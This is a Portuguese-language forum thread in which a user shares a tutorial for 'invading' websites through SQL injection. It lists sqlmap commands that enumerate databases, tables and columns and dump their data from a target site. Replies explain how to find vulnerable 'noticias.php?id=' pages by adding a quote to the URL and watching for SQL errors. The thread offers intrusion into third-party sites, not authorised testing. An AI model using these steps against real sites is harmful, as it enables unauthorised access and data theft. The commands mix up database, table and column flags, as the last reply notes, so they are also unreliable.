Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadindo site com vulnerabilidade SQLI

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Video Aula Invadindo site com vulnerabilidade SQLI

    Bom galerinha não sou muito conhecido vou ser
    Eu tava mexendo no BACKTRACK 5 e aprendi a invadir site com vulnerabilidade
    Ai eu estava com preguiça de fazer video aula e achei essa na net
    Ela é muito boa...
    Pois ensina tudo oque um iniciante deve saber...

    ATENÇÃO : O TUTORIAL DO SITE QUE EU RETIREI NAO TEM NENHUM VINCULO COM A EMPRESA DO BACKTRACK, ELES NAO MODIFICAM O SISTEMA, SOMENTE EXPLORAM SUAS FERRAMENTAS

    Link : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Exploit utilizada : sqlmap
    Códigos utilizado na exploit :

    ./sqlmap.py -u site --dbs

    ./sqlmap.py -u site --dbs -D nomedatabela --tables

    ./sqlmap.py -u site --dbs -T nomedacoluna --columns

    ./sqlmap.py -u site --dbs -T nomedacoluna --columns -C nomedatabeladentrodacoluna --dump

  • Font Size
    #2
    Mtoo bomm, só nao intendi uma coisa no "SITE" tem q colocar o que tem o ID aquele em que aparece a vulnerabilidade ou apenas o site exemplo.com.br ?
    </ShutdowN>

    Comment


    • Font Size
      #3
      Postado Originalmente por luanlbmk Ver Post
      Mtoo bomm, só nao intendi uma coisa no "SITE" tem q colocar o que tem o ID aquele em que aparece a vulnerabilidade ou apenas o site exemplo.com.br ?
      o site tem que ter essa parte "noticias.php?id=" pois isso indica que ele pode ter vulnerabilidade, e para ver se tem vulnerabilidade coloque asssim "noticias.php?id=numero' " e no programa tire o '

      Comment


      • Font Size
        #4
        O site tem que estar vulneravel...Use a tag ' no final do link, se aparecer erro de SQL a pagina esta vulneravel

        Comment


        • Font Size
          #5
          Acho que você não aprendeu muito não ein, ta confundindo.

          Misturou tabela com coluna e database, reveja o vídeo e se corrija.
          " Att King Valentine "

          king_valentine@hotmail.com

          Comment

          X
          Working...
          X